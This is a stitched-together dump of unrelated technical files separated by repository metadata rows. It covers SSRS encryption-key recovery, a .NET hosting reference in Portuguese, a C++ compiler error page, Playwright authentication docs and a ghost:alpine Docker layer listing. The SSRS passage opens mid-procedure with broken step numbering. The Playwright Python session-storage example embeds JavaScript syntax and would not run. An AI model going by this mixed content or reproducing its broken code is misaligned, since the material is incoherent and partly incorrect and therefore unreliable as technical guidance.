1. Open Windows Explorer and navigate to *drive*:\Program Files\Microsoft SQL Server\\*report_server_instance*\Reporting Services. Replace *drive* with your drive letter and *report_server_instance* with the folder name that corresponds to the report server instance for which you want to disable the Web service and HTTP access. For example, C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services.
2. Open the rsreportserver.config file.
3. For the **IsWebServiceEnabled** property, specify **False**, and then save your changes.
2. Start the Reporting Services Configuration tool, and then connect to the report server instance you want to configure.
3. On the Encryption Keys page, click **Change**. [!INCLUDE[clickOK](../../includes/clickok-md.md)]
4. Restart the Report Server Windows service. If you are recreating encryption keys for a scale-out deployment, restart the service on all instances.
5. Re-enable the Web service and HTTP access by modifying the **IsWebServiceEnabled** property in the rsreportserver.config file. Do this for all instances if you are working with a scale out deployment.
### How to recreate encryption keys (rskeymgmt)
1. Disable the Report Server Web service and HTTP access. Use the instructions in the previous procedure to stop Web service operations.
2. Run **rskeymgmt.exe** locally on the computer that hosts the report server. Use the **-s** argument to reset the symmetric key. No other arguments are required:
```
rskeymgmt -s
```
3. Restart the Reporting Services Windows service.
## Deleting Unusable Encrypted Content
If for some reason you cannot restore the encryption key, the report server will never be able to decrypt and use any data that is encrypted with that key. To return the report server to a working state, you must delete the encrypted values that are currently stored in the report server database and then manually re-specify the values you need.
Deleting the encryption keys removes all symmetric key information from the report server database and deletes any encrypted content. All unencrypted data is left intact; only encrypted content is removed. When you delete the encryption keys, the report server re-initializes itself automatically by adding a new symmetric key. The following occurs when you delete encrypted content:
- Connection strings in shared data sources are deleted. Users who run reports get the error "The ConnectionString property has not been initialized."
- Stored credentials are deleted. Reports and shared data sources are reconfigured to use prompted credentials.
- Reports that are based on models (and require shared data sources configured with stored or no credentials) will not run.
- Subscriptions are deactivated.
Once you delete encrypted content, you cannot recover it. You must re-specify connection strings and stored credentials, and you must activate subscriptions.
You can use the Reporting Services Configuration tool or the **rskeymgmt** utility to remove the values.
### How to delete encryption keys (Reporting Services Configuration Tool)
1. Start the Reporting Services Configuration tool, and then connect to the report server instance you want to configure.
2. Click **Encryption Keys**, and then click **Delete**. [!INCLUDE[clickOK](../../includes/clickok-md.md)]
3. Restart the Report Server Windows service. For a scale-out deployment, do this on all report server instances.
### How to delete encryption keys (rskeymmgt)
1. Run **rskeymgmt.exe** locally on the computer that hosts the report server. You must use the **-d** apply argument. The following example illustrates the argument you must specify:
```
rskeymgmt -d
```
2. Restart the Report Server Windows service. For a scale-out deployment, do this on all report server instances.
### How to re-specify encrypted values
1. For each shared data source, you must retype the connection string.
2. For each report and shared data source that uses stored credentials, you must retype the user name and password, and then save. For more information, see [Specify Credential and Connection Information for Report Data Sources](../../reporting-services/report-data/specify-credential-and-connection-information-for-report-data-sources.md).
3. For each data-driven subscription, open each subscription and retype the credentials to the subscription database.
4. For subscriptions that use encrypted data (this includes the File Share delivery extension and any third-party delivery extension that uses encryption), open each subscription and retype credentials. Subscriptions that use Report Server e-mail delivery do not use encrypted data and are unaffected by the key change.
## See Also
[Configure and Manage Encryption Keys (SSRS Configuration Manager)](../../reporting-services/install-windows/ssrs-encryption-keys-manage-encryption-keys.md)
[Store Encrypted Report Server Data (SSRS Configuration Manager)](../../reporting-services/install-windows/ssrs-encryption-keys-store-encrypted-report-server-data.md)
| 73.435897 | 573 | 0.760824 | eng_Latn | 0.996616 |
61b85022665995c8ffd16d66754ba8afa99b5a45 | 401 | md | Markdown | hunter2-lessons/power-of-none/content/step8.md | ekmixon/appsec-education | e8b50f63ee9c62a2bb9a0944f83a2b636939ffd5 | [
"BSD-3-Clause"
] | 56 | 2019-10-28T15:50:38.000Z | 2022-03-31T18:40:05.000Z | hunter2-lessons/power-of-none/content/step8.md | misfir3/appsec-education | e6f90fb88e7a2c439e21405526dfaff554c1750e | [
"BSD-3-Clause"
] | 76 | 2021-05-14T23:58:34.000Z | 2022-03-29T22:33:46.000Z | hunter2-lessons/power-of-none/content/step8.md | misfir3/appsec-education | e6f90fb88e7a2c439e21405526dfaff554c1750e | [
"BSD-3-Clause"
] | 13 | 2019-11-19T11:31:27.000Z | 2021-05-17T12:27:03.000Z | ## Complete!
With these new checks in place, we're assured that the two values - `input1` and `input2` - are strings that can be correctly compared. While there are other ways to correct the issue with the `code` value handling, this fix spotlighted the requirement for good input validation both at the user submission and method levels.
You have completed this lesson and will now receive credit.
| 66.833333 | 325 | 0.785536 | eng_Latn | 0.99994 |
61b91442da5bfc3b0266b71fa672750a826cc187 | 1,468 | md | Markdown | docs/framework/unmanaged-api/hosting/icorruntimehost-mapfile-method.md | juucustodio/docs.pt-br | a3c389ac92d6e3c69928c7b906e48fbb308dc41f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/hosting/icorruntimehost-mapfile-method.md | juucustodio/docs.pt-br | a3c389ac92d6e3c69928c7b906e48fbb308dc41f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/hosting/icorruntimehost-mapfile-method.md | juucustodio/docs.pt-br | a3c389ac92d6e3c69928c7b906e48fbb308dc41f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Método ICorRuntimeHost::MapFile
ms.date: 03/30/2017
api_name:
- ICorRuntimeHost.MapFile
api_location:
- mscoree.dll
api_type:
- COM
f1_keywords:
- ICorRuntimeHost::MapFile
helpviewer_keywords:
- ICorRuntimeHost::MapFile method [.NET Framework hosting]
- MapFile method [.NET Framework hosting]
ms.assetid: 45ae0502-0a31-4342-b7e3-f36e1cf738f3
topic_type:
- apiref
ms.openlocfilehash: 3b1a0cd9a1dfba6f33a20416f2a10c967f871a06
ms.sourcegitcommit: c76c8b2c39ed2f0eee422b61a2ab4c05ca7771fa
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 05/21/2020
ms.locfileid: "83762663"
---
# <a name="icorruntimehostmapfile-method"></a>Método ICorRuntimeHost::MapFile
Mapeia o arquivo especificado na memória. Esse método é obsoleto.
## <a name="syntax"></a>Sintaxe
```cpp
HRESULT MapFile(
[in] HANDLE hFile,
[out] HMODULE* hMapAddress
);
```
## <a name="parameters"></a>Parâmetros
`hFile`
no O identificador do arquivo a ser mapeado.
`hMapAddress`
fora O endereço de memória inicial no qual começar a mapear o arquivo.
## <a name="requirements"></a>Requisitos
**Plataformas:** confira [Requisitos do sistema](../../get-started/system-requirements.md).
**Cabeçalho:** MSCorEE. h
**Biblioteca:** Incluído como um recurso em MSCorEE. dll
**Versão do .NET Framework:** 1,0, 1,1
## <a name="see-also"></a>Veja também
- [Interface ICorRuntimeHost](icorruntimehost-interface.md)
| 26.214286 | 94 | 0.724114 | por_Latn | 0.316177 |
61b925c8533a0f2f58ce7d3d6f68571199c41d87 | 1,479 | md | Markdown | docs/error-messages/compiler-errors-2/compiler-error-c3056.md | OpenLocalizationTestOrg/cpp-docs.pt-br | 8db634f3c761bd342bf650a6794e72189b199c9f | [
"CC-BY-4.0"
] | null | null | null | docs/error-messages/compiler-errors-2/compiler-error-c3056.md | OpenLocalizationTestOrg/cpp-docs.pt-br | 8db634f3c761bd342bf650a6794e72189b199c9f | [
"CC-BY-4.0"
] | null | null | null | docs/error-messages/compiler-errors-2/compiler-error-c3056.md | OpenLocalizationTestOrg/cpp-docs.pt-br | 8db634f3c761bd342bf650a6794e72189b199c9f | [
"CC-BY-4.0"
] | null | null | null | ---
title: Compiler Error C3056 | Microsoft Docs
ms.custom:
ms.date: 11/04/2016
ms.reviewer:
ms.suite:
ms.technology:
- devlang-csharp
ms.tgt_pltfrm:
ms.topic: article
f1_keywords:
- C3056
dev_langs:
- C++
helpviewer_keywords:
- C3056
ms.assetid: 9500173d-870b-49b3-8e88-0ee93586d19a
caps.latest.revision: 7
author: corob-msft
ms.author: corob
manager: ghogen
translation.priority.ht:
- de-de
- es-es
- fr-fr
- it-it
- ja-jp
- ko-kr
- ru-ru
- zh-cn
- zh-tw
translation.priority.mt:
- cs-cz
- pl-pl
- pt-br
- tr-tr
translationtype: Machine Translation
ms.sourcegitcommit: 3168772cbb7e8127523bc2fc2da5cc9b4f59beb8
ms.openlocfilehash: b3d8f49c518921bc41c5adf568d9fcdf1a190344
---
# Compiler Error C3056
'symbol' : symbol is not in the same scope with 'threadprivate' directive
A symbol used in a [threadprivate](../../parallel/openmp/reference/threadprivate.md) clause must be in the same scope as the `threadprivate` clause.
The following sample generates C3056:
```
// C3056.cpp
// compile with: /openmp
int x, y;
void test() {
#pragma omp threadprivate(x, y) // C3056
#pragma omp parallel copyin(x, y)
{
x = y;
}
}
```
Possible resolution:
```
// C3056b.cpp
// compile with: /openmp /LD
int x, y;
#pragma omp threadprivate(x, y)
void test() {
#pragma omp parallel copyin(x, y)
{
x = y;
}
}
```
<!--HONumber=Jan17_HO2-->
| 18.259259 | 151 | 0.649763 | eng_Latn | 0.377425 |
61b965a56bb5744b707b5e5968be8a9c79b1a270 | 873 | md | Markdown | docs/GeocodeAddress.md | Syncsort/PreciselyAPIsSDK-Android | 752d575414ca06f04c1499c86a5cc569c5043437 | [
"Apache-2.0"
] | null | null | null | docs/GeocodeAddress.md | Syncsort/PreciselyAPIsSDK-Android | 752d575414ca06f04c1499c86a5cc569c5043437 | [
"Apache-2.0"
] | null | null | null | docs/GeocodeAddress.md | Syncsort/PreciselyAPIsSDK-Android | 752d575414ca06f04c1499c86a5cc569c5043437 | [
"Apache-2.0"
] | null | null | null |
# GeocodeAddress
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**objectId** | **String** | | [optional]
**mainAddressLine** | **String** | | [optional]
**addressLastLine** | **String** | | [optional]
**placeName** | **String** | | [optional]
**areaName1** | **String** | | [optional]
**areaName2** | **String** | | [optional]
**areaName3** | **String** | | [optional]
**areaName4** | **String** | | [optional]
**postCode1** | **String** | | [optional]
**postCode2** | **String** | | [optional]
**country** | **String** | | [optional]
**addressNumber** | **String** | | [optional]
**streetName** | **String** | | [optional]
**unitType** | **String** | | [optional]
**unitValue** | **String** | | [optional]
**customFields** | **Map<String, Object>** | | [optional]
| 30.103448 | 65 | 0.509737 | yue_Hant | 0.582505 |
61b9841af1fc1dd385cf913d8609403531e8540e | 11,357 | md | Markdown | python/docs/auth.md | dgozman/playwright.dev | e3ffd8f43710574497822430c09fe596c0cb243f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | python/docs/auth.md | dgozman/playwright.dev | e3ffd8f43710574497822430c09fe596c0cb243f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | python/docs/auth.md | dgozman/playwright.dev | e3ffd8f43710574497822430c09fe596c0cb243f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
id: auth
title: "Authentication"
---
Playwright can be used to automate scenarios that require authentication.
Tests written with Playwright execute in isolated clean-slate environments called [browser contexts](./core-concepts.md#browser-contexts). This isolation model improves reproducibility and prevents cascading test failures. New browser contexts can load existing authentication state. This eliminates the need to login in every context and speeds up test execution.
> Note: This guide covers cookie/token-based authentication (logging in via the app UI). For [HTTP authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication) use [browser.new_context(**options)](./api/class-browser.md#browsernew_contextoptions).
- [Automate logging in](#automate-logging-in)
- [Reuse authentication state](#reuse-authentication-state)
- [Multi-factor authentication](#multi-factor-authentication)
## Automate logging in
The Playwright API can automate interaction with a login form. See [Input guide](./input.md) for more details.
The following example automates login on GitHub. Once these steps are executed, the browser context will be authenticated.
```py
# async
page = await context.new_page()
await page.goto('https://github.com/login')
# Interact with login form
await page.click('text=Login')
await page.fill('input[name="login"]', USERNAME)
await page.fill('input[name="password"]', PASSWORD)
await page.click('text=Submit')
# Verify app is logged in
```
```py
# sync
page = context.new_page()
page.goto('https://github.com/login')
# Interact with login form
page.click('text=Login')
page.fill('input[name="login"]', USERNAME)
page.fill('input[name="password"]', PASSWORD)
page.click('text=Submit')
# Verify app is logged in
```
These steps can be executed for every browser context. However, redoing login for every test can slow down test execution. To prevent that, we will reuse existing authentication state in new browser contexts.
## Reuse authentication state
Web apps use cookie-based or token-based authentication, where authenticated state is stored as [cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) or in [local storage](https://developer.mozilla.org/en-US/docs/Web/API/Storage). Playwright provides [browser_context.storage_state(**options)](./api/class-browsercontext.md#browser_contextstorage_stateoptions) method that can be used to retrieve storage state from authenticated contexts and then create new contexts with prepopulated state.
Cookies and local storage state can be used across different browsers. They depend on your application's authentication model: some apps might require both cookies and local storage.
The following code snippet retrieves state from an authenticated context and creates a new context with that state.
```py
# async
import json
import os
# Save storage state and store as an env variable
storage = await context.storage_state()
os.environ["STORAGE"] = json.dumps(storage)
# Create a new context with the saved storage state
storage_state = json.loads(os.environ["STORAGE"])
context = await browser.new_context(storage_state=storage_state)
```
```py
# sync
import json
import os
# Save storage state and store as an env variable
storage = context.storage_state()
os.environ["STORAGE"] = json.dumps(storage)
# Create a new context with the saved storage state
storage_state = json.loads(os.environ["STORAGE"])
context = browser.new_context(storage_state=storage_state)
```
### Session storage
Session storage ([`window.sessionStorage`](https://developer.mozilla.org/en-US/docs/Web/API/Window/sessionStorage)) is specific to a particular domain. Playwright does not provide API to persist session storage, but the following snippet can be used to save/load session storage.
```py
# async
import os
# Get session storage and store as env variable
session_storage = await page.evaluate("() => JSON.stringify(sessionStorage)")
os.environ["SESSION_STORAGE"] = session_storage
# Set session storage in a new context
session_storage = os.environ["SESSION_STORAGE"]
await context.add_init_script(storage => {
if (window.location.hostname == 'example.com') {
entries = JSON.parse(storage)
Object.keys(entries).forEach(key => {
window.sessionStorage.setItem(key, entries[key])
})
}
}, session_storage)
```
```py
# sync
import os
# Get session storage and store as env variable
session_storage = page.evaluate("() => JSON.stringify(sessionStorage)")
os.environ["SESSION_STORAGE"] = session_storage
# Set session storage in a new context
session_storage = os.environ["SESSION_STORAGE"]
context.add_init_script(storage => {
if (window.location.hostname == 'example.com') {
entries = JSON.parse(storage)
Object.keys(entries).forEach(key => {
window.sessionStorage.setItem(key, entries[key])
})
}
}, session_storage)
```
### Lifecycle
Logging in via the UI and then reusing authentication state can be combined to implement **login once and run multiple scenarios**. The lifecycle looks like:
1. Run tests (for example, with `npm run test`).
1. Login via UI and retrieve authentication state.
* In Jest, this can be executed in [`globalSetup`](https://jestjs.io/docs/en/configuration#globalsetup-string).
1. In each test, load authentication state in `beforeEach` or `beforeAll` step.
This approach will also **work in CI environments**, since it does not rely on any external state.
### Example
[This example script](https://github.com/microsoft/playwright/blob/master/docs/examples/authentication.js) logs in on GitHub.com with Chromium, and then reuses the logged in storage state in WebKit.
### API reference
- [browser_context.storage_state(**options)](./api/class-browsercontext.md#browser_contextstorage_stateoptions)
- [browser.new_context(**options)](./api/class-browser.md#browsernew_contextoptions)
- [page.evaluate(expression, **options)](./api/class-page.md#pageevaluateexpression-options)
- [browser_context.add_init_script(**options)](./api/class-browsercontext.md#browser_contextadd_init_scriptoptions)
## Multi-factor authentication
Accounts with multi-factor authentication (MFA) cannot be fully automated, and need manual intervention. Persistent authentication can be used to partially automate MFA scenarios.
### Persistent authentication
Web browsers use a directory on disk to store user history, cookies, IndexedDB and other local state. This disk location is called the [User data directory](https://chromium.googlesource.com/chromium/src/+/master/docs/user_data_dir.md).
Note that persistent authentication is not suited for CI environments since it relies on a disk location. User data directories are specific to browser types and cannot be shared across browser types.
User data directories can be used with the [browser_type.launch_persistent_context(user_data_dir, **options)](./api/class-browsertype.md#browser_typelaunch_persistent_contextuser_data_dir-options) API.
```py
# async
import asyncio
from playwright.async_api import async_playwright
async def main():
async with async_playwright() as p:
user_data_dir = '/path/to/directory'
browser = await p.chromium.launch_persistent_context(userDataDir, headless=False)
# Execute login steps manually in the browser window
asyncio.get_event_loop().run_until_complete(main())
```
```py
# sync
from playwright.sync_api import sync_playwright
with sync_playwright() as p:
user_data_dir = '/path/to/directory'
browser = p.chromium.launch_persistent_context(user_data_dir, headless=False)
# Execute login steps manually in the browser window
```
### Lifecycle
1. Create a user data directory on disk 2. Launch a persistent context with the user data directory and login the MFA account. 3. Reuse user data directory to run automation scenarios.
### API reference
- [BrowserContext]
- [browser_type.launch_persistent_context(user_data_dir, **options)](./api/class-browsertype.md#browser_typelaunch_persistent_contextuser_data_dir-options)
[Accessibility]: ./api/class-accessibility.md "Accessibility"
[Browser]: ./api/class-browser.md "Browser"
[BrowserContext]: ./api/class-browsercontext.md "BrowserContext"
[BrowserType]: ./api/class-browsertype.md "BrowserType"
[CDPSession]: ./api/class-cdpsession.md "CDPSession"
[ChromiumBrowserContext]: ./api/class-chromiumbrowsercontext.md "ChromiumBrowserContext"
[ConsoleMessage]: ./api/class-consolemessage.md "ConsoleMessage"
[Dialog]: ./api/class-dialog.md "Dialog"
[Download]: ./api/class-download.md "Download"
[ElementHandle]: ./api/class-elementhandle.md "ElementHandle"
[FileChooser]: ./api/class-filechooser.md "FileChooser"
[Frame]: ./api/class-frame.md "Frame"
[JSHandle]: ./api/class-jshandle.md "JSHandle"
[Keyboard]: ./api/class-keyboard.md "Keyboard"
[Mouse]: ./api/class-mouse.md "Mouse"
[Page]: ./api/class-page.md "Page"
[Playwright]: ./api/class-playwright.md "Playwright"
[Request]: ./api/class-request.md "Request"
[Response]: ./api/class-response.md "Response"
[Route]: ./api/class-route.md "Route"
[Selectors]: ./api/class-selectors.md "Selectors"
[TimeoutError]: ./api/class-timeouterror.md "TimeoutError"
[Touchscreen]: ./api/class-touchscreen.md "Touchscreen"
[Video]: ./api/class-video.md "Video"
[WebSocket]: ./api/class-websocket.md "WebSocket"
[Worker]: ./api/class-worker.md "Worker"
[Element]: https://developer.mozilla.org/en-US/docs/Web/API/element "Element"
[Evaluation Argument]: ./core-concepts.md#evaluationargument "Evaluation Argument"
[Promise]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise "Promise"
[iterator]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Iteration_protocols "Iterator"
[origin]: https://developer.mozilla.org/en-US/docs/Glossary/Origin "Origin"
[selector]: https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors "selector"
[Serializable]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#Description "Serializable"
[UIEvent.detail]: https://developer.mozilla.org/en-US/docs/Web/API/UIEvent/detail "UIEvent.detail"
[UnixTime]: https://en.wikipedia.org/wiki/Unix_time "Unix Time"
[xpath]: https://developer.mozilla.org/en-US/docs/Web/XPath "xpath"
[Any]: https://docs.python.org/3/library/typing.html#typing.Any "Any"
[bool]: https://docs.python.org/3/library/stdtypes.html "bool"
[Callable]: https://docs.python.org/3/library/typing.html#typing.Callable "Callable"
[EventContextManager]: https://docs.python.org/3/reference/datamodel.html#context-managers "Event context manager"
[Dict]: https://docs.python.org/3/library/typing.html#typing.Dict "Dict"
[float]: https://docs.python.org/3/library/stdtypes.html#numeric-types-int-float-complex "float"
[int]: https://docs.python.org/3/library/stdtypes.html#numeric-types-int-float-complex "int"
[List]: https://docs.python.org/3/library/typing.html#typing.List "List"
[NoneType]: https://docs.python.org/3/library/constants.html#None "None"
[Pattern]: https://docs.python.org/3/library/re.html "Pattern"
[URL]: https://en.wikipedia.org/wiki/URL "URL"
[pathlib.Path]: https://realpython.com/python-pathlib/ "pathlib.Path"
[str]: https://docs.python.org/3/library/stdtypes.html#text-sequence-type-str "str"
[Union]: https://docs.python.org/3/library/typing.html#typing.Union "Union" | 45.979757 | 507 | 0.77133 | eng_Latn | 0.460357 |
61b987c364d5af448fbb0a68f4cf91a619299323 | 72 | md | Markdown | README.md | Segse/OJSO | a31329d6d9a140f1f3a9ff05b896ea755ffa7872 | [
"MIT"
] | 1 | 2017-09-19T23:04:02.000Z | 2017-09-19T23:04:02.000Z | README.md | Segse/OJSO | a31329d6d9a140f1f3a9ff05b896ea755ffa7872 | [
"MIT"
] | null | null | null | README.md | Segse/OJSO | a31329d6d9a140f1f3a9ff05b896ea755ffa7872 | [
"MIT"
] | null | null | null | # OJSO
Object-oriented Javascript-Library - oJSo - Javascript with ears
| 24 | 64 | 0.791667 | eng_Latn | 0.829452 |
61ba7570994abe5548b6a72ad6da3c6602a827f9 | 62,988 | md | Markdown | repos/ghost/remote/alpine.md | victorvw/repo-info | 9e552baded50c4ec520bca3bb8d5645b17c48c56 | [
"Apache-2.0"
] | null | null | null | repos/ghost/remote/alpine.md | victorvw/repo-info | 9e552baded50c4ec520bca3bb8d5645b17c48c56 | [
"Apache-2.0"
] | null | null | null | repos/ghost/remote/alpine.md | victorvw/repo-info | 9e552baded50c4ec520bca3bb8d5645b17c48c56 | [
"Apache-2.0"
] | null | null | null | ## `ghost:alpine`
```console
$ docker pull ghost@sha256:1bc5473624107cca1b104a30f4306321367d38bceb86b2ed1ffa94386539c2bb
```
- Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json`
- Platforms:
- linux; amd64
- linux; arm variant v6
- linux; arm variant v7
- linux; arm64 variant v8
- linux; 386
- linux; ppc64le
- linux; s390x
### `ghost:alpine` - linux; amd64
```console
$ docker pull ghost@sha256:230d19122af4b74857403ee2dad7248a7cbdd90c3af01fec6c28b8f5cf1e4e89
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **109.0 MB (109023264 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:efff227b432c56c211f158921448d6dcbd89f41b6d1da98ead96416012844e9d`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Fri, 24 Apr 2020 01:05:03 GMT
ADD file:b91adb67b670d3a6ff9463e48b7def903ed516be66fc4282d22c53e41512be49 in /
# Fri, 24 Apr 2020 01:05:03 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:45:00 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 22:45:06 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 22:45:06 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 22:45:08 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 22:45:08 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 22:45:09 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:45:09 GMT
CMD ["node"]
# Tue, 26 May 2020 23:08:26 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:08:28 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:08:29 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:08:29 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:08:57 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:08:57 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:08:58 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:08:58 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:10:22 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:10:24 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:10:24 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:10:25 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:10:25 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:10:26 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:10:26 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:cbdbe7a5bc2a134ca8ec91be58565ec07d037386d1f1d8385412d224deafca08`
Last Modified: Thu, 23 Apr 2020 14:07:19 GMT
Size: 2.8 MB (2813316 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f2258f794beb1f503eb2951ce0825088dfaf1b1351cec61d423a9d36e6074ced`
Last Modified: Tue, 26 May 2020 22:48:30 GMT
Size: 24.7 MB (24740785 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:15bb2c1711f4234fb4ece973e4c6a76c536ea07629e4e1fe72d6e5f9def0100e`
Last Modified: Tue, 26 May 2020 22:48:23 GMT
Size: 2.2 MB (2239066 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5c89d818d1fec3df1d4a708492894de475c4daa5f8053a4d589d9b0484e2c099`
Last Modified: Tue, 26 May 2020 22:48:21 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
